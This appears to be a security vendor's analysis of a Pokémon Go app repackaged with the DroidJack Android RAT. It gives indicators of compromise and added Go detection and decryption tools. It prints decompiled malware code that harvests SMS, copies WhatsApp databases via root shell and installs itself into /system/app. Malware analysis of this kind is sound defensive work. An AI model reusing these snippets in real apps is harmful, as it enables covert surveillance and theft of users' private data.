September 2, 2016

Pokémon Go bundles with Malicious Remote Administration Tool DroidJack

Due to the expanding popularity of Pokémon Go, the app has attracted more attention from attackers than ever, because a popular game is an efficient carrier for spreading malicious apps. Trustlook recently discovered a Pokémon Go app repackaged with the RAT (Remote Administration Tool) DroidJack. The app appears to be a normal game, but it can actually be used to control the user's device. The analyzed Trojan package can be identified by the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

The app is identical to the normal Pokémon Go app when it is running:

[Screenshots: the repackaged app running; it looks identical to the legitimate game]

The app is signed with the following certificate, which does not belong to the Pokémon Go game developer:

[Image: signing certificate of the repackaged app]

From the following code structure images, the package "net.droidjack.server" can be found:

[Image: decompiled code structure showing the net.droidjack.server package]
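As an added example (not part of the Trustlook report and not code from the sample), the following Go program applies the indicators above to an APK file: it hashes the whole file against the published MD5/SHA256 values and scans every .dex entry inside the APK (which is a zip) for the net.droidjack.server package path, the same package the decompiled class tree shows. Repackaging changes the file hash, so the string scan is the check that survives a rebuild with the same RAT inside. The APK it inspects is constructed in memory and the class names in it are made up for the demonstration; the program does not verify the signing certificate.

```go
package main

import (
	"archive/zip"
	"bytes"
	"crypto/md5"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"strings"
)

// Indicators taken from the report above.
const (
	KnownMD5     = "d350cc8222792097317608ea95b283a8"
	KnownSHA256  = "15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4"
	DroidJackPkg = "net/droidjack/server" // how net.droidjack.server appears in DEX class descriptors
)

// TriageResult collects what a first-pass offline check of an APK can establish.
type TriageResult struct {
	MD5, SHA256   string
	HashMatch     bool     // file hash equals a published indicator
	DroidJackSeen bool     // a .dex entry references the DroidJack package
	DexFiles      []string // every .dex entry that was scanned
}

// TriageAPK hashes the file and scans each DEX entry for the DroidJack package path.
func TriageAPK(apk []byte) (TriageResult, error) {
	var r TriageResult
	m := md5.Sum(apk)
	s := sha256.Sum256(apk)
	r.MD5 = hex.EncodeToString(m[:])
	r.SHA256 = hex.EncodeToString(s[:])
	r.HashMatch = r.MD5 == KnownMD5 || r.SHA256 == KnownSHA256

	zr, err := zip.NewReader(bytes.NewReader(apk), int64(len(apk)))
	if err != nil {
		return r, fmt.Errorf("not a valid APK/zip: %w", err)
	}
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".dex") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return r, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return r, err
		}
		r.DexFiles = append(r.DexFiles, f.Name)
		if bytes.Contains(data, []byte(DroidJackPkg)) {
			r.DroidJackSeen = true
		}
	}
	return r, nil
}

// BuildSampleAPK is a constructed stand-in for a real APK: a zip holding a fake
// classes.dex whose string pool carries class descriptors. The class names are
// made up for this demonstration (hypothetical, not from the sample).
func BuildSampleAPK(withDroidJack bool) []byte {
	pool := "dex\n035\x00Lcom/nianticlabs/pokemongo/MainActivity;\x00"
	if withDroidJack {
		pool += "Lnet/droidjack/server/Controller;\x00"
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("classes.dex")
	w.Write([]byte(pool))
	zw.Close()
	return buf.Bytes()
}

func main() {
	for _, infected := range []bool{false, true} {
		r, err := TriageAPK(BuildSampleAPK(infected))
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("sha256=%s hashMatch=%v droidjack=%v dex=%v\n",
			r.SHA256, r.HashMatch, r.DroidJackSeen, r.DexFiles)
	}
}
```

On a real file, read the APK with os.ReadFile and pass the bytes to TriageAPK; a hash match identifies this exact build, while DroidJackSeen flags any other build that still ships the unrenamed DroidJack server package.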

The DroidJack RAT tool can perform the following malicious activities:

  • Get SMS Messages
  • Monitor/record calls
  • Get call logs
  • Browser bookmarks/history
  • WhatsApp Call Logs
  • GPS location
  • WhatsApp Chat
  • Record sound
  • Capture video
  • Take picture
  • Send device information
  • Install file to system folder
  • Update itself

The following code snippets are responsible for collecting SMS messages:


 {
   ag localag = new ag(this.c);
   localag.b();
   // Sent messages are read through the SMS content provider
   Object localObject = Uri.parse("content://sms/sent");
   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
   if (localCursor.getCount() > 0) {} // decompiler artifact; the loop below does the work
   for (;;)
   {
     if (!localCursor.moveToNext()) {
       return;
     }
     String str3 = localCursor.getString(localCursor.getColumnIndex("body"));
     String str1 = localCursor.getString(localCursor.getColumnIndex("address"));
     String str4 = localCursor.getString(localCursor.getColumnIndex("date"));
     String str2 = a(str1); // resolve the phone number to a contact name
     localObject = str2;
[…]

 protected void b()
 {
   ag localag = new ag(this.c);
   localag.a();
   // Received messages come from the inbox of the same provider
   Object localObject = Uri.parse("content://sms/inbox");
   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
   if (localCursor.getCount() > 0) {} // decompiler artifact
   for (;;)
   {
     if (!localCursor.moveToNext()) {
       return;
     }
     String str3 = localCursor.getString(localCursor.getColumnIndex("body"));
     String str1 = localCursor.getString(localCursor.getColumnIndex("address"));
     String str2 = a(str1); // contact name for the number, if any
     localObject = str2;
     if (str2 == null) {
       localObject = str1; // fall back to the raw number
     }
     // Store number, display name, body and timestamp for exfiltration
     localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex("date")));
   }
 }

The following code snippets are used to retrieve WhatsApp logs:

 protected byte[] a()
 {
   try
   {
     // Destination on external storage for a copy of the WhatsApp message database
     this.d = new File(Environment.getExternalStorageDirectory() + "/WhatsApp/Databases/wams.db");
     // Requires root: the private app directory is copied through a "su" shell
     Object localObject = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
     ((DataOutputStream)localObject).writeBytes("cp data/data/com.whatsapp/databases/msgstore.db " + this.d.getAbsolutePath());
     ((DataOutputStream)localObject).writeBytes("\nexit");
     Thread.sleep(10000L);
     if (this.d.exists()) {} // decompiler artifact; the copied file is read here
     return "NoWA".getBytes(); // reported back when no WhatsApp data was found
   }

The following code snippets are used to install files to the system folder:

public class FBDBSender

 protected byte[] c()
 {
   try
   {
     // Path of this app's own APK
     Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);
     DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
     // Remount /system read-write, copy the APK into /system/app, remount read-only
     localDataOutputStream.writeBytes("mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system\n");
     localDataOutputStream.writeBytes("cp -rp " + ((File)localObject).getAbsolutePath() + " /system/app/" + ((File)localObject).getName());
     localDataOutputStream.writeBytes("\nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system");
     localDataOutputStream.writeBytes("\nexit");
     Thread.sleep(10000L);
     localObject = "Ack".getBytes();
     return localObject;
   }

The malware may encrypt the collected data using AES before sending it out:

import android.util.Base64;
import java.security.Key;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class aj
{
 // Hard-coded 16-byte AES key, stored as its ASCII byte values
 private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

 // Encrypt: "AES" with no mode given resolves to AES/ECB/PKCS5Padding; 1 == Cipher.ENCRYPT_MODE
 public static String a(String paramString) throws Exception
 {
   Key localKey = a();
   Cipher localCipher = Cipher.getInstance("AES");
   localCipher.init(1, localKey);
   return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0); // 0 == Base64.DEFAULT
 }

 private static Key a()
 {
   return new SecretKeySpec(a, "AES");
 }

 // Decrypt: 2 == Cipher.DECRYPT_MODE
 public static String b(String paramString) throws Exception
 {
   Key localKey = a();
   Cipher localCipher = Cipher.getInstance("AES");
   localCipher.init(2, localKey);
   return new String(localCipher.doFinal(Base64.decode(paramString, 0)));
 }
}
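The key bytes in class aj are a printable ASCII string, and Cipher.getInstance("AES") on Android resolves to AES/ECB/PKCS5Padding. As an added example (not code from the report or from DroidJack), the following Go program reproduces aj.a() and aj.b() with that hard-coded key, so an analyst can decode data captured from an infected device during incident response, and it shows why ECB is a weak choice: identical plaintext blocks encrypt to identical ciphertext blocks. The sample plaintext is constructed for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Key material copied from the byte array in class aj above.
var hardcodedKey = []byte{76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65}

// KeyAsASCII shows that the key is a printable 16-byte (AES-128) string.
func KeyAsASCII() string { return string(hardcodedKey) }

// pkcs5Pad and pkcs5Unpad reproduce the padding of Java's default "AES"
// transform (AES/ECB/PKCS5Padding).
func pkcs5Pad(b []byte, bs int) []byte {
	n := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte, bs int) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errors.New("length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS5 padding")
	}
	return b[:len(b)-n], nil
}

// RawEncrypt is AES-128 in ECB mode, block by block, as aj.a() does before Base64.
func RawEncrypt(plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(hardcodedKey)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	padded := pkcs5Pad(plain, bs)
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += bs {
		block.Encrypt(out[i:i+bs], padded[i:i+bs])
	}
	return out, nil
}

// RawDecrypt reverses RawEncrypt and validates the padding.
func RawDecrypt(ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(hardcodedKey)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(ct) == 0 || len(ct)%bs != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	out := make([]byte, len(ct))
	for i := 0; i < len(ct); i += bs {
		block.Decrypt(out[i:i+bs], ct[i:i+bs])
	}
	return pkcs5Unpad(out, bs)
}

// EncryptLikeSample mirrors aj.a(): encrypt, then Base64 (Android flag 0 = DEFAULT).
func EncryptLikeSample(plain string) (string, error) {
	ct, err := RawEncrypt([]byte(plain))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

// DecryptLikeSample mirrors aj.b(). Android's Base64.DEFAULT wraps output with
// line breaks every 76 characters, so whitespace is stripped before decoding.
func DecryptLikeSample(b64 string) (string, error) {
	clean := strings.Join(strings.Fields(b64), "")
	ct, err := base64.StdEncoding.DecodeString(clean)
	if err != nil {
		return "", err
	}
	pt, err := RawDecrypt(ct)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

func main() {
	fmt.Printf("hard-coded key: %q\n", KeyAsASCII())
	// Constructed sample record, not real captured data
	enc, _ := EncryptLikeSample("+15550100|hello")
	fmt.Println("encrypted:", enc)
	dec, _ := DecryptLikeSample(enc)
	fmt.Println("decrypted:", dec)
}
```

Because the key is fixed in the APK and ECB has no IV, every infected device encrypts the same record to the same ciphertext; that repetition is itself a usable network detection signal, and the decryptor above turns recovered traffic back into plaintext without any device-specific secret.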

Summary

Installing apps from third-party sources may expose your device to potential threats. Downloading only from a trusted source is one way to keep devices secure. Installing a security app such as Trustlook Mobile Security & Antivirus also helps to prevent identity theft and safeguard you online.